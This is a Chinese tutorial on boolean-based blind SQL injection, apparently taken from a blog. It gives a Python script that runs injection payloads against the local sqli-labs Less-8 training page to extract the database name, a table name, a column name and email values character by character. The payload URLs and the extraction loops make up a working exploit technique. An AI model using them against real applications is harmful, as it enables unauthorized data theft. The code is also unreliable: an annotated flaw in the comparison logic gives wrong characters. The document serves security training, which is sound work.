基于布尔的盲注

盲注是 SQL 注入的一种，指的是在看不到查询返回数据的情况下，通过对数据内容进行逐步猜测来实施注入。盲注一般分为布尔盲注和基于时间的盲注。

#coding:utf-8
import requests

# chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# Walk-through of a boolean-based blind injection against the local sqli-labs
# training target (Less-8). The page body only ever comes back with one of two
# lengths (706 or 722), so the body length is the true/false oracle every routine
# below reads; anything above 706 is treated as "condition held".
#
# The original listing lost its indentation; the final print() in each routine
# is assumed to sit after the loops (reviewer assumption — verify against the
# source post if the progress output matters).
#
# NOTE(review): every probe compares with a strict ">" and the alphabet is
# ascending, so a loop stops at the first candidate whose code point is below
# the real character rather than at the character itself.

# The schema-name length (8) was established beforehand with:
# http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23

def get_db_name():
    """Probe the current schema name one position at a time and print it.

    Positions 1..8 are probed; for each, the first alphabet character the
    length oracle accepts is appended to the printed string.
    """
    probe = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    recovered = ""
    for position in range(1, 9):
        for candidate in alphabet:
            page = requests.get(probe.format(position, ord(candidate)))
            # only two body lengths exist: 706 (false page) and 722 (true page)
            if len(page.text) > 706:
                recovered += candidate
                break
    print (recovered)

# The first table name's length (6) was established beforehand with:
# http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
def get_table_name():
    """Probe the first table name of the current schema (6 positions) and print it."""
    probe = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23"
    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    recovered = ""
    for position in range(1, 7):
        for candidate in alphabet:
            page = requests.get(probe.format(position, ord(candidate)))
            # only two body lengths exist: 706 (false page) and 722 (true page)
            if len(page.text) > 706:
                recovered += candidate
                break
    print(recovered)

# Before reading a column name its length has to be known as well; the original
# post gives a length(column_name) query against information_schema.columns for
# the emails table here, but the listing is cut off mid-URL in this copy.

def get_column_name():
    """Probe the first column name of the table 0x656d61696c73 ("emails") and print it.

    Only positions 1..2 are probed; the alphabet additionally allows "_".
    """
    probe = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23"
    alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
    recovered = ""
    for position in range(1, 3):
        for candidate in alphabet:
            page = requests.get(probe.format(position, ord(candidate)))
            # only two body lengths exist: 706 (false page) and 722 (true page)
            if len(page.text) > 706:
                recovered += candidate
                break
    print(recovered)

def get_data():
    """Probe the first email_id value of the emails table (16 positions) and print it.

    The alphabet adds "." and "@" so address-like values can be matched.
    """
    probe = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23"
    alphabet = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
    recovered = ""
    for position in range(1, 17):
        for candidate in alphabet:
            page = requests.get(probe.format(position, ord(candidate)))
            # only two body lengths exist: 706 (false page) and 722 (true page)
            if len(page.text) > 706:
                recovered += candidate
                break
    print(recovered)
原文地址:https://www.cnblogs.com/NBeveryday/p/8687373.html